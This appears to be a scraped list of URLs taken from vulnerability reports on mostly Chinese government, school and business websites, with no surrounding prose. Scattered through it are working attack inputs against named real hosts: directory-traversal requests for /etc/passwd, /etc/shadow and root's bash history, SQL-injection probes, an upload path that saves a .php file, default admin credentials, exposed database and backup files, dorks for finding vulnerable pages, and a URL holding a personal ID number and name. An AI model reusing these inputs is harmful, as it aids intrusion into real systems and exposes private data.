http://www.wanxinsoft.com/product1_3.asp http://202.206.48.106/model/TwoGradePage/NewsMore.aspx?columnId=211 http://202.206.48.106/model/TwoGradePage/CIntroduce.aspx?columnId=191 http://202.206.48.106/model/TwoGradePage/NewsMore.aspx?columnId=211 http://www.wanxinsoft.com/product1_1.asp http://www.wanxinsoft.com/product1_3.asp http://182.129.150.10:8001/ http://sgjxsyzx.ecust.edu.cn/ http://61.132.139.110:8888/ http://59.69.101.10/ http://www.dzgc.cdut.edu.cn/ http://202.206.48.106/ http://aacc.cumt.edu.cn/ http://lysyzx.hqu.edu.cn/ http://210.33.29.49/ http://222.204.208.4/ http://emlab.usst.edu.cn/ http://202.120.50.200/ http://hzhlab.hytc.edu.cn/ http://lab.hutc.zj.cn:8090/ http://dgdz.xzit.edu.cn http://labch.cumt.edu.cn:81/ http://lab.hutc.zj.cn:8070/ http://lab.hutc.zj.cn:8090/model/twogradepage/newsdetail.aspx?id=132&columnid=70 http://lab.hutc.zj.cn:8090/model/twogradepage/newsdetail.aspx?id=132&columnid=70 http://www.wanxinsoft.com/product1_1.asp http://www.wanxinsoft.com/product1_3.asp http://182.129.150.10:8001/ http://sgjxsyzx.ecust.edu.cn/ http://61.132.139.110:8888/ http://59.69.101.10/ http://www.dzgc.cdut.edu.cn/ http://202.206.48.106/ http://aacc.cumt.edu.cn/ http://lysyzx.hqu.edu.cn/ http://210.33.29.49/ http://222.204.208.4/ http://emlab.usst.edu.cn/ http://202.120.50.200/ http://hzhlab.hytc.edu.cn/ http://lab.hutc.zj.cn:8090/ http://dgdz.xzit.edu.cn http://labch.cumt.edu.cn:81/ http://lab.hutc.zj.cn:8070/ http://202.206.48.106/model/TwoGradePage/LookShiYanShi.aspx?LID=1127&columnId=203 http://202.206.48.106/model/TwoGradePage/NewsEquipment.aspx?id=45023&openid=86&columnId=203 http://202.206.48.106/model/TwoGradePage/NewsEquipment.aspx?id=45023&openid=86&columnId=203 http://123.58.188.207:8081/ http://app.cmiea.org/agency.php?q=1%27%22 https://personalbank.cib.com.cn/pers/main/resources/js/CIB_Plugin.exe http://www.sdzydfy.com/web/sCMS.asp?typeid=2 http://211.100.17.7/pics/201308/8bd49a31-7247-476c-a5a7-f90fb7a76cc2.jsp http://www.wenjuan.com http://center.tkfy.kongzhong.com/user/get_user_server?account= http://ss.linekong.com/morei.php?sort_id=126 http://ss.linekong.com/morei.php?sort_id=126&page=1 http://ss.linekong.com/game_datum/freshman/novice.php?sort_id=154 http://appbg.xiaoma.com/users/sign_in http://ws.gxfy.gov.cn/doc/xxfb/show/read_newsbig.php?NEWS_ID=182835&FY_ID=127 http://3g.hzrc.com/Qz/PGetPassWord.aspx http://www.baiyue.net/cn/news_info.aspx?id=261&cid=66 http://app.suning.com/android/dev/registry?step=2 http://app.suning.com/upload/img/idpic/20140922/541ff8654fda58891822292eb538cd87ef85683b0cf822a8132ca4.php http://223.252.196.130/common/web_meeting/index.php此站存在注射 http://wooyun.org/bugs/wooyun-2010-061504 http://223.252.196.130:80//common/web_meeting/index.php?module=modify_meeting_info http://1dui1.huatu.com/index.php/FaceList/index/?province=14 http://o2o.homevv.com/jpl_special/?special_cat=4 http://oa.sohu-inc.com/EmployeeLogin.aspx http://download.coolyun.com/php.php http://www.haas.cn/newsview.aspx?id=1504 http://www.xtxt.heagri.gov.cn http://www.xtbx.heagri.gov.cn http://www.xtgz.heagri.gov.cn http://www.xtlc.heagri.gov.cn http://www.xtlx.heagri.gov.cn http://www.xtly.heagri.gov.cn http://www.xtng.heagri.gov.cn http://www.xtnq.heagri.gov.cn http://www.xtnj.heagri.gov.cn http://www.xtpx.heagri.gov.cn http://www.xtqh.heagri.gov.cn http://www.xtrx.heagri.gov.cn http://www.xtsh.heagri.gov.cn http://www.xtnh.heagri.gov.cn http://www.jlswj.net/houtai/login.asp admin:admin888 http://www.jlswj.net/houtai/,直接进入后台,无需登陆; https://itunes.apple.com/in/app/uc-browser-fastest-mobile/id586871187?mt=8 http://new.houtai.juwan.cn/PhoneAssistantServer/html/login.php http://bizcn.com/newticket?module=showimage&fileNmae=/home.jsp http://42.99.16.16:8080/productmanager/ http://218.80.215.200:8080/pms/MainAction.do http://218.80.215.200:8080/pms/index.jsp?type=workSheet http://218.80.215.200:8080/pms/CommonFileDownloadAction.do?fileName=../../../../../etc/passwd http://218.80.215.200:8080/pms/CommonFileDownloadAction.do?fileName=../../../../../etc/shadow http://218.80.215.200:8080/pms/CommonFileDownloadAction.do?fileName=../../../../../root/.bash_history http://ads.meilishuo.com/welcome/tuanLogin http://202.203.209.15/ynumis/ https://itunes.apple.com/cn/app/sou-gou-liu-lan-qi-wan-mei/id548608066?mt=8 http://www.hzdgxx.org/index.aspx?PageGuid=581D1489-7B9B-4C80-9794-22E87FB5AF66&CatalogID=925 http://www.hzchcx.com/index.aspx?pageguid=0DD4737E-FE13-4BC6-BADD-DD4692B5E1DE&catalogID=216 http://www.hzxxsy.com/index.aspx?pageGuid=2722D5AF-1ED8-4852-B69B-52538739715E&CatalogID=1027 http://www.hzbwxx.com/index.aspx?pageguid=6EA5D084-7513-49ED-B3AF-8A6DAB8082F3&catalogID=77 http://61.175.193.70:99/index.aspx?pageGuid=21B7FBA5-5396-484C-8B1F-A3B7723D7BE8&CatalogID=1263 http://www.hzdgxx.org/index.aspx?PageGuid=581D1489-7B9B-4C80-9794-22E87FB5AF66&CatalogID=925为例 http://segmentfault.com/blog/simapple_on_segmentfault/1190000000689343 https://1.1.1.1/audit/123baobiao.php http://admin.xxx.gov.cn/general/ http://www.zjrzfy.gov.cn/ http://www.zjzy.gov.cn/ http://www.jsjrfy.gov.cn/ http://www.njng.gov.cn/ http://www.jsrepc.com/ http://www.sundy-whcy.com/ http://www.njlsjjjc.gov.cn/溧水纪检监察网 http://www.jzscxh.com/ http://www.jnkjj.gov.cn/江宁科技局 http://www.jszlyy.com.cn/江苏省肿瘤医院 http://cxy.jnkjj.gov.cn/江宁区产学研合作信息网 http://admin.zjrzfy.gov.cn/general/index.php http://ah.118100.cn/cring/jsp/user/shop_moregif www.cnet.com.cn用的程序是phpcmsv9 http://cou.cnet.com.cn/此网站居然是phpcmsv9的演示站, http://www.fivesoft.com.cn/ http://www.asp168.com/default.php http://www.asp168.com/default.php?mod=article&fid=40 http://mail.156.cn/ http://mail.156.cn/auth/step1.action http://mail.156.cn/css.jsp http://demo.cmseasy.cn/ http://demo.cmseasy.cn/index.php?case=archive&act=orders&aid=18 http://demo.cmseasy.cn/index.php?case=archive&act=orders&oid=20140923175406 http://localhost/index.php?case=archive&act=orders&oid=20140923180320-0-0- www.rscxw.com:9496 http://app.caijing.com.cn/?app=contribution&controller=panel&action=index http://www.taishanyy.com/html/show-ybyk.asp?id=2311 http://www.haitiansoft.com:8080/ http://www.gnun.edu.cn/cc.asp http://192.168.1.116/admin/index.php?lfj=mysql&action=out inurl:ntbookretrtopshowright.aspx http://ms.xijing.edu.cn/newsbrow.asp?stype=&type='&id=618 http://www.xaasj.com/newsbrow.asp?stype=&type='&id=1229 http://www.haitiansoft.com:8080/ http://www.asp168.com/default.php http://www.asp168.com/default.php?mod=article&fid=40 http://www.baidu.com/s?wd=Powered%20by%20AppCMS%20&rsv_spt=1&issp=1&f=8&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_enter=0&rsv_n=2&rsv_sug3=1&rsv_sug4=976&inputT=1591 http://www.jxpost.com.cn/netsearch/ http://www.jxpost.com.cn/netsearch/ http://gysxx.wljt.sc.sgcc.com.cn/template.do?method=previewnav&sid=/v8AMQAwADYANA==(四川电力物资公司) http://pinge.focus.cn/u/inspiration/ http://www.jxxm.gov.cn/mucc/about.asp?id=51 http://www.jxywj.com/mucc/about.asp?id=67 http://www.jxzxwsy.com/mucc/about.asp?id=47 http://www.jxgzwsy.com/mucc/about.asp?id=47 http://www.jxazwsy.com/mucc/about.asp?id=47 http://www.jxbjy.com/mucc/about.asp?id=47 http://www.jxzlyy.com/mucc/about.asp?id=47 http://www.jxqswsy.com/mucc/about.asp?id=47 http://www.jxsywsy.com/mucc/about.asp?id=47 http://www.jxqsyy.com/mucc/about.asp?id=47 http://www.jxlyjw.com/mucc/about.asp?id=67 http://www.jxjhfzs.com/mucc/about.asp?id=47 http://www.jxjsws.com/mucc/about.asp?id=47 http://www.jxcywsy.com/mucc/about.asp?id=47 http://www.jxlswsy.com/mucc/about.asp?id=47 http://www.jxjbkz.com/mucc/about.asp?id=47 http://www.jxflswsy.com/mucc/about.asp?id=47 http://www.jxdgwsy.com/mucc/about.asp?id=47 http://www.jxlgzwsy.com/mucc/about.asp?id=47 http://www.jxpfz.com/mucc/about.asp?id=47 http://www.jxmzjw.gov.cn/mucc/about.asp?id=47 http://www.kaida56.cn/mucc/about.asp?id=47 http://www.jxyzwsy.com/mucc/about.asp?id=47 site:189.cn inurl:order http://alumni.hqu.edu.cn/index.php?m=Article&a=article&id=2816&type=0%2C0%2C0 http://www.asp168.com/default.php http://www.asp168.com/default.php?mod=article&fid=40 http://www.13356331388.com/ http://域名/adminqibo5/Login.asp http://www.jxjbkz.com/mucc/about.asp?id=47 http://www.jxlswsy.com/mucc/about.asp?id=47 http://www.jxlyjw.com/mucc/about.asp?id=47 http://www.rzjxxa.com/mucc/about.asp?id=47 http://www.xzh120.com/mucc/about.asp?id=51 http://www.cnhengyuan.net/mucc/about.asp?id=56 http://www.rzscxh.com/mucc/about.asp?id=47 http://www.rzhc.net/mucc/about.asp?id=53 http://www.donghui-steel.com/mucc/about.asp?id=51 http://www.jxrmyy.com/mucc/about.asp?id=55 http://www.kaidajiaxiao.com/mucc/about.asp?id=55 http://www.13356331388.com/mucc/about.asp?id=47 http://www.jxywj.com/mucc/about.asp?id=47 http://www.jxflswsy.com/mucc/about.asp?id=47 http://www.hip.com.cn/magazine/magdet.asp?id=1725 inurl:Showservices.asp?id= inurl:showkbxx.asp?id= inurl:Showservices.asp?id= inurl:showkbxx.asp?id= http://www.zenitsoft.com//admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.php http://gunduzi.duapp.com/ file:///etc/passwd xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006 xmlns:o="urn:schemas-microsoft-com:office:office xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math xmlns:v="urn:schemas-microsoft-com:vml xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing xmlns:w10="urn:schemas-microsoft-com:office:word xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml http://www.fivesoft.com.cn/ http://www.zhgjjt.com:8888/ http://www.zhwsbs.gov.cn:9013/shfw/xhTicket/payCtky2.xhtml?we=1&txtSchLocalCode=0001001&txtSchStationName=%25E9%25A6%2599%25E6%25B4%25B2%25E6%2580%25BB%25E7%25AB%2599&txtSchWaitStCode=102017&txtSchDstNode=10001063&txtSchWaitingRoom=&txtSchDate=2014-09-27&txtSchTime=05:30&txtSchWaitStName=%25E9%25A6%2599%25E6%25B4%25B2%25E9%2595%25BF%25E9%2580%2594%25E7%25AB%2599&txtSchDstNodeName=%25E5%25B9%25BF%25E5%25B7%259E&txtSchPrice=65.00&txtSchTicketCount=43&txtNumberTicket=1 https://12XX.XXXX.9X/system/download_cert.php?manager=1&user_id=2&cert_psw=11 https://12XX.XXXX.9X/system/download_cert.php?manager=1&user_id=2&cert_psw=11 http://www.notery.net/ http://www.notery.net/npage.asp?id=19 http://域名/sys/ http://www.kqgzc.com/page.asp?id=638 http://www.hzgzc.com/2009/ http://dxgzccn.cnc119.000pc.net/ http://www.bygzc.cn/old/ http://www.hhhtgzc.com/ http://www.bhgzc.com/ http://sggzccn.cnc506.000pc.net/ http://www.szlive800.com/faq.asp?id=11 http://www.fyxf.fy.cn/index.php?tpl=dispnews&artid=68704 http://www.fyxf.fy.cn/index.php?tpl=dispnews&artid=68704 http://www.tylmw.cn/tjsearch.php?act=save http://www.tylmw.cn/broadband_ajax.php?tstime=1411548817979&key=1 http://www.haitiansoft.com:8080/ http://work.ch.gongchang.com/companyinfo.html http://自己的用户名.cn.gongchang.com/ http://wooyun.cn.gongchang.com/ http://gdtj.chinasarft.gov.cn/wszb/filemanage/ajaxGetDepartList.aspx?departcode= inurl:Pro_shcn.asp?ArticleID= http://www.jhhoek.com/Pro_shcn.asp?ArticleID=1 http://www.scmg.gov.cn/database/jycms.mdb http://www.archives.gov.cn/search/List.jsp?s=archives&g=&k=&pno=1&n=10&mft=&asid=null&mfa=&mfext=&mfsd=&mfed=&mfss=&mfes=&o=&oa=&sp=&xpath=-1&tsct=&ta=&red=&rdd=&ts=&extsearch=y&period=01 http://www.zhcqq.gov.cn/article_guest.asp?guestid=9 http://xhagri.xhkj.gov.cn/news/catalogdetail.asp?catalog_id=5 http://www.lldm.gov.cn/xinxi/news_view.asp?newsid=19 http://www.sqxrsj.gov.cn/vote.asp?inquiryId=1 http://www.fhlr.gov.cn/jzxxread.php?id=293 http://www.hyst.gov.cn/info.asp?cid=41&pid=39 http://www.xyjd.gov.cn/InfoList.php?S=1 http://www.ywgt.gov.cn/yggc/NewsList.asp?SortID=9 http://www.tlsafety.gov.cn/showall.asp?table=tjs&fid=1&n=%E6%94%BF%E5%8A%A1%E4%BF%A1%E6%81%AF&nn=%E6%9C%BA%E6%9E%84%E8%81%8C%E8%83%BD http://sdlw.lss.gov.cn/bsdt.asp?classid1=389&classname=%E5%85%AC%E5%85%B1%E5%B0%B1%E4%B8%9A%E6%9C%8D%E5%8A%A1 http://hzfx.ahxf.gov.cn/news/list.asp?news_id=509 http://www.ncfdj.gov.cn/CongYeZhuTiXianShi.aspx?ID=20 http://www.ycsdwgk.gov.cn/list.jsp?urltype=tree.TreeTempUrl&wbtreeid=1020 http://www.nhxdj.gov.cn/huodong.jsp?urltype=tree.TreeTempUrl&wbtreeid=6047 http://pxzx.zjdpc.gov.cn/Detail.aspx?t=2&id=8 http://jjw.wensheng.gov.cn/News.aspx?className=%e8%a1%8c%e6%94%bf%e8%ae%b8%e5%8f%af http://www.fjhrss.gov.cn/cjcyxcs.asp?id=78 http://www.jxgtzyj.gov.cn/new.asp?articleid=220&bigclassname=%E6%9C%AC%E5%B1%80%E5%8A%A8%E6%80%81 http://www.jxfgw.gov.cn/info/index.asp?id=1 http://www.nphbj.gov.cn/viewzxzx.asp?id=1424 http://www.gdmz.gov.cn/bbs/rss.php?auth=0 http://www.chsw.gov.cn/about.php?id=1 http://www.wljw.gov.cn/twomore.aspx?id=13 http://www.lfs.gov.cn/cn_asp/subject.asp?typeid=96 http://www.dhrkjs.gov.cn/news_more.asp?lm=17 http://www.yxxdjw.gov.cn/web/news_view.asp?newsid=9797 http://mail.slpop.gov.cn/content.do?method=sendTo&cid=106 http://www.gyfg.gov.cn/cjwdContent.aspx?cjwd_id=187&list_id=11 http://www.szkx.gov.cn/Info_View.aspx?id=454 http://www.sygbzx.gov.cn/News/newlist.do?PrtID=1 http://ysl.daqing.gov.cn/bszn.asp?ClassID=8 http://www.tljw.gov.cn/article.php?MsgId=92911 http://www.haiyou.gov.cn/news.asp?tp=162 www.haiyou.gov.cn http://www.pucheng.gov.cn/about_list.aspx?id=5&oid=1&menus=1 http://www.fnxjw.gov.cn/article.php?MsgId=92530 http://www.lankj.gov.cn/Content.asp?t=%B2%FA%C9%FA%D3%EB%B7%A2%D5%B9&l=1 http://www.hhxz.gov.cn/application/wsbs/bszn/xzzhinanxiang.jsp?ZJJGDM=011387204&depName=%E5%B8%82%E5%8F%91%E6%94%B9%E5%B1%80 http://gzqw.ntgz.gov.cn/default.php?mod=article&settype=0&fid=2443 http://jgzh.bjmy.gov.cn/showxiangmu7.asp?art_id=110 http://www.asgy.gov.cn/xzsp_x.asp?id=19 http://www.tlmw.gov.cn/Data/Data_content.aspx?trans_data_id=344 http://www.bazhen.gov.cn/sjxx.asp?id=21 http://www.zs-safety.gov.cn/infoList.aspx?ColId=128&SecId=132 http://www.njfwwb.gov.cn/newslist.aspx?news_type=7 http://www.sxcbd.gov.cn/article3.asp?bigid=1&smallid=8&smallid1=14 http://chp.smesd.gov.cn/clist.jsp?id=1453 http://www.dyzw.gov.cn/newsshow.asp?id=7017&c=%D5%FE%B8%AE%CE%C4%B8%E6 http://www.lclz.gov.cn/bigclass.asp?typeid=27&bigclassid=0&smallclassid=0 http://www.jlcg.gov.cn/listnews1.asp?nid=2727 http://www.xdj.gov.cn/vote/show.asp?VoteID=4 http://www.xjxngo.gov.cn/content.asp?id=5 http://www.pj148.gov.cn/info/infomore.asp?id=T0202 http://www.chhb.gov.cn/xc.asp?id=3 http://big5.pingdu.gov.cn/Plugin/huisinvote/DynamicWeb.aspx?voteID=25 http://www.sdlqrd.gov.cn/type.asp?ID=12 http://www.xaagri.gov.cn/ggny/list.aspx?area=%E6%88%B7%E5%8E%BF http://www.wjlf.gov.cn/news_info/list.asp?sort_id=14 http://www.hbcy.gov.cn/application/zwgk/xzzhinanxiang.jsp?dhbt=%E5%8A%9E%E4%BA%8B%E6%8C%87%E5%8D%97&ZJJGDM=01114101X&depName=%E9%95%BF%E9%98%B3%E5%8E%BF%E5%9B%BD%E5%9C%9F%E8%B5%84%E6%BA%90%E5%B1%80 http://www.scbz.hrss.gov.cn/Class.asp?PrdID=124&ClassID=125&ClassName=%E6%9C%BA%E6%9E%84%E8%AE%BE%E7%BD%AE http://www.lyqrd.gov.cn/ShowNews.asp?id=1007 http://xxgk.cicheng.gov.cn/news_more.asp?id=1 http://www.aqjj.gov.cn/cgs/shownews.asp?id=801 http://qzlx.aqcz.gov.cn/show.php?id=339 http://www.hnxdj.gov.cn/news_more.asp?lm=&lm2=83&open=_blank&tj=0&hot=0 http://jsj.btdsss.gov.cn/index.jsp?urltype=tree.TreeTempUrl&wbtreeid=10761 http://zzb.btdsss.gov.cn/list.jsp?urltype=tree.TreeTempUrl&wbtreeid=10718 http://www.cxzfj.gov.cn/wzphoto.asp?id=10768 http://www.scncjt.gov.cn/mail.aspx?type=2 http://www.whjjw.gov.cn/article.php?MsgId=92974 http://xilin.gov.cn/app/online/PageView.jsp?id=794850e035fc11e3832af80f41f81b9d http://www.xaagri-net.gov.cn/contoctus.asp?id=24 http://dez.sxjs.gov.cn/Category.aspx?lx=01 http://dgjx.dg.gov.cn/player.asp?id=86 http://www.pkgt.gov.cn/List.asp?Catalog=23 http://www.edu-gzstats.gov.cn/show/showarticle.asp?ID=770 http://www.bzzj.gov.cn/mail/newmail.asp?class=14 http://www.jrzgh.gov.cn/onews.asp?id=213 http://www.pjngo.gov.cn/content.asp?id=5 http://www.jdztby.gov.cn/xxzx/infodetail.asp?Catalog=%5C%E5%A4%AA%E7%99%BD%E5%9B%AD%E8%A1%97%E9%81%93%5C%E6%9C%80%E6%96%B0%E5%85%AC%E5%91%8A%5C&Mov_ID=4096 http://www.chswsj.gov.cn/show.asp?id=701&Bid=8&Sid= http://www.rcxgaj.gov.cn/guestbook/list.aspx?classid=2&isSearch=0 http://www.sdxtgh.gov.cn/infolist.asp?id=1453&big=1&small=2 http://www.yangdong.gov.cn/lj/lxshow.asp?id=15435 http://yysmzx.yyedu.gov.cn/files/boardshow.asp?B_id=93&CategoryName=%E5%85%AC%E5%91%8A http://www.paitou.gov.cn/articlelist_zt_news.asp?classid=20140401 http://www.mazhan.gov.cn/news.asp?SmallClassID=7&BigClassID=16 http://www.abaj.gov.cn/down_show.asp?id=62 http://www.ahrfb.gov.cn/sitecn/minfo.aspx?id=300 http://www.jixiandj.gov.cn/list.jsp?wbtreeid=1002 http://www.chinatalents.gov.cn/bshz/detail.aspx?pageid=355 http://www.qhdm.gov.cn/xinxi/news_view.asp?newsid=18 http://www.liuba.gov.cn/copy_1_copy_3_lmy.jsp?urltype=tree.TreeTempUrl&wbtreeid=1363 http://www.gzpy519.gov.cn/zwgk/tztg_list.asp?ptype=%CD%A8%D6%AA%CD%A8%B8%E6 http://www.tcprice.gov.cn/xinwen/News.aspx?sort=001002 http://smwsbsdt.xintai.gov.cn/permissionitem_list_Sort.jspx?sortcode=001001012&areaid=370982 http://www.zjsw.gov.cn/list_content.php?newsid=835&newstypeid=38 http://gcjs.pucheng.gov.cn/list.aspx?id=70 http://www.hhxjw.gov.cn/news_more.asp?lm2=107 http://gsgajt.gov.cn/NewsShow.aspx?id=26210 http://www.hyjwjc.gov.cn/index_lzjyshow.asp?id=2&cdr=%E8%AF%BB%E4%B9%A6%E6%80%9D%E5%BB%89 http://www.yqgtzyj.gov.cn/about.asp?id=37 http://www.aqthjjjc.gov.cn/article.php?MsgId=91265 http://sp.sxfz.gov.cn/bookshow.asp?id=156 http://www.gzq.gov.cn/zmhd/zxdc_form.jsp?catid=50%7C118&id=3 http://www.jnqngo.gov.cn/content.asp?id=5 http://www.gzny.gov.cn/e/tool/gbook/index1sly.php?lyid=1713 http://www.jhsafety.gov.cn/View_1.asp?id=3476 http://www.wxncdj.gov.cn/BulletinShow.aspx?cid=51 http://www.jiancha.bjshy.gov.cn/dtlevel2.jsp?caid=009 http://www.huayuan.gov.cn/gonggaoshow.asp?id=17 http://www.yiwufg.gov.cn/forDev/ysz.php?pid=5754 http://www.ymhmw.gov.cn/cun/c_index.asp?tid=667 http://people.nbfet.gov.cn/hyzsxi.php?id=519 http://shx.smesd.gov.cn/list.jsp?id=1346 http://fda.nbjiangbei.gov.cn/zxbs-4.aspx?classid=65 http://fzb.zjj.gov.cn/deptemplates/v7/news.jsp?topid=002003065&columnid=002003065002002 http://youth.whx.gov.cn/ArticleContent.asp?ID=2971 http://www.jsjcy.gov.cn/config.asp?id=6 http://yljy.10.gov.cn/article.asp?class=8 http://www.jintang.gov.cn/Investment/list.jsp?ClassID=02011701 http://www.massfj.gov.cn/old/news_detail.asp?id=4356 http://www.fshlx.gov.cn/ins.asp?t=1&s=8&i=17 http://www.bjsgsl.gov.cn/newlist.php?id=17 http://www.hsepb.gov.cn/ztzl.asp?SpecialID=16 http://www.dttour.gov.cn/shownewsfile.asp?id=968&title=%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%9B%BD%E9%99%85%E5%B8%90%E7%AF%B7%E9%9F%B3%E4%B9%90%E8%8A%82%E5%8A%A8%E5%91%98%E5%A4%A7%E4%BC%9A%E4%B8%BE%E8%A1%8C http://www.ahczjj.gov.cn/ShowNews.asp?id=1677 http://www.nmwhrd.gov.cn/readnews.php?class=%E5%B8%B8%E5%A7%94%E4%BC%9A%E4%BC%9A%E8%AE%AE http://www.pxngo.gov.cn/content.asp?id=5 http://qw.hrbcs.gov.cn/newslist.jsp?lmid=76 http://www.xcrf.gov.cn/look_page_2.asp?yiid=32&erid=22 http://www.jrfgw.gov.cn/onews.asp?id=2468 http://lgpf.gov.cn/vote/view.asp?id=12 http://huanbao.shishi.gov.cn/Picture/ShowPicture.asp?id=18 http://xs.ycga.gov.cn/default.php?mod=article&fid=5 http://www.ycsjsj.gov.cn/list.asp?borderid=54 http://www.cqitpo.gov.cn/optitude/download.jsp?menuid=10 http://www.jsgyrc.gov.cn/grqz/show.asp?id=2254 http://www.jianwei.bjshy.gov.cn/rdfk/shownews.asp?newsid=1262 http://www.hhscj.gov.cn/picshow.aspx?id=999 http://www.jlszgyj.gov.cn/seenews_info.asp?newsid=383 http://www.baotingdj.gov.cn/showdongtai.asp?id=719 http://nbdsly.gov.cn/gzdt_1.aspx?id=11 http://www.hljzx.gov.cn/Master/Wymldutylist.aspx?S_ID=259&CMD=look http://119.57.67.200:8080/swtg/login.action http://glxy.chinamobile.com/news/chooseNews.html?id=257 www.jsxh.com.cn/admin/Admin.aspx http://www.13356331388.com/ http://域名/adminqibo5/Login.asp http://www.jxjbkz.com/ http://www.jxlswsy.com/ http://www.jxlyjw.com/ http://www.rzjxxa.com/ http://www.xzh120.com/ http://www.cnhengyuan.net/ http://www.rzscxh.com/ http://www.rzhc.net/ http://www.donghui-steel.com/ http://www.jxrmyy.com/ http://www.kaidajiaxiao.com/ http://www.13356331388.com/ http://www.jxywj.com/ http://www.jxflswsy.com/ http://www.jxxm.gov.cn/mucc/shownews.asp?id=1030 http://www.notery.net/ http://www.notery.net/npage.asp?id=19 http://域名/sys/ http://www.kqgzc.com/list.asp?kind=wcfc http://www.kqgzc.com/list.asp?kind=alfx http://www.kqgzc.com/list.asp?kind=bzzn http://www.kqgzc.com/list.asp?kind=ywfw http://www.hzgzc.com/2009/list.asp?kind=bzzn http://dxgzccn.cnc119.000pc.net/list.asp?kind=bzzn http://www.bygzc.cn/old/list.asp?kind=bzzn http://www.hhhtgzc.com/list.asp?kind=bzzn http://www.bhgzc.com/list.asp?kind=bzzn http://sggzccn.cnc506.000pc.net/list.asp?kind=bzzn http://jssccx.zjt.gov.cn/PractitionPersonnel/Search/frame.aspx?dw=-1&ry=-1&iURLFlag=9 http://jssccx.zjt.gov.cn/PractitionPersonnel/Search/Personnel_resume.aspx?idcard=610404196307101032&name=%E6%9D%8E%E5%AD%A6%E5%8D%AB&type=0 http://www.gzyj.com/search.html www.nkpx.com的。但是因为权限不够,无法访问。 http://www.hbycscjzx.com//OperationManage/DownFile.aspx www.hbycscjzx.com http://www.13356331388.com/ http://域名/adminqibo5/Login.asp http://www.jxjbkz.com/ http://www.jxlswsy.com/ http://www.jxlyjw.com/ http://www.rzjxxa.com/ http://www.xzh120.com/ http://www.cnhengyuan.net/ http://www.rzscxh.com/ http://www.rzhc.net/ http://www.donghui-steel.com/ http://www.jxrmyy.com/ http://www.kaidajiaxiao.com/ http://www.13356331388.com/ http://www.jxywj.com/ http://www.jxflswsy.com/ http://www.cnhengyuan.net/mucc/tupianshow.asp?id=437 http://51good.3322.org:9527/ http://wap.91160.com出现了sql注入 http://wap.91160.com/index.php?a=index&c=scan&code=1%27%22 http://api.91160.com/出现了弱口令 http://wxmge.91160.com/main/login.html http://kczy.zjut.edu.cn/gene/user_login.asp http://www.wwawwo.com/productinfo.php?id=294 http://www.wugang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.wugang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.wugang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.sdjs.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.taojiang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://anxiang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.czjj.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://gjdx.sd.vnet.cn http://gjdx.sd.vnet.cn/findPassword.html http://gjdx.sd.vnet.cn/findPassword.do http://www.rcwl.net/b/tea/table_list.jsp?typeId=1 http://www.rcwl.net/b/tea/table_list.jsp?typeId=1 http://sc.zhidao.189.cn http://sc.zhidao.189.cn/scene/deals!detail.do?id=1137496 http://www.lifetour.com.tw/fckeditor/editor/filemanager/connectors/test.html# http://www.lifetour.com.tw//eWeb_lifetour/file/zz22.asp/00026844.txt http://www.lifetour.com.tw:8000/default_lifetour.asp http://www.uc56.com:80/cn/job/recruitments www.bhcwl.com http://www.syyxbj.com/textcon.asp?id=2 http://www.lnhfrc.com/textcon.asp?c=1&id=123 http://www.spring0416.com/textcon.asp?id=106 http://www.shiyedianji.com/textcon.asp?id=170 http://www.syhqgs.cn/textcon.asp?id=105 http://www.syjihong.com/textcon.asp?id=106 http://www.dfcbaby888.com/textcon.asp?id=2 http://sytq.net/en/textcon.asp?id=38 http://www.sydbl.com/textcon.asp?id=106 http://syrixing.com/textcon.asp?id=2 http://www.lneca.cn/textcon.asp?id=122 http://shiyedianji.com/textcon.asp?id=176 http://www.syperfect.com/textcon.asp?id=153 http://sytq.net/textcon.asp?id=6 http://www.syrixing.com/textcon.asp?id=3 http://www.lneca.cn/textcon.asp?id=122 http://www.sysbio.org.cn/ShowInfo.php?id=660 http://ktv.cms.bookinge.com/ http://www.wintour.cn/case.html inurl:register.html http://www.weimob.com/MemManage/MemberExport/aid/330896/keyword-input//type//integral-grade http://www.weimob.com/MemManage/MemberExport/aid/330896 http://202.101.157.209:81/Cache/RECYCLER.rar http://202.101.157.209:81/html/jk_patient_in_hospital.rar http://202.101.157.209:81/html/admin.asp http://202.101.157.209:81/admin.asp http://psych.ccnu.edu.cn/viewsite.action http://www.fl.zjut.edu.cn/admin/ http://210.32.200.240:20000/w/1/login.asp http://3g.***.cn/mb_msgTransmit.asp?msgid=0890000 http://3g.***.cn/mb_msgTransmit.asp?msgid=1897873 http://www.wintour.cn http://www.xfi-hotel.com/admin http://www.xfi-hotel.com/ http://www.lido-hotel.cn/ http://www.panyuhotel.com/ http://www.redstarhotel.com/ www.hisunsray.com http://www.hisunsray.com/news/comp_view.asp?fileid=10485729&typeId=2550 http://www.xmqcz.com/listbbs.php?fid=15 http://61.175.197.109/ http://love.163.com/2772876 http://arab.bfsu.edu.cn/index.php/Index/alist/id/13 http://www.bhcwl.com/ http://www.syyxbj.com/ http://www.lnhfrc.com/ http://www.spring0416.com/ http://www.shiyedianji.com/ http://www.syhqgs.cn/ http://www.syjihong.com/ http://www.dfcbaby888.com/ http://sytq.net/en/ http://www.sydbl.com/ http://syrixing.com/ http://www.lneca.cn/ http://shiyedianji.com/ http://www.syperfect.com/ http://sytq.net/ http://www.syrixing.com/ http://www.sytq.net/news.asp?ss=5&big=14&id=2 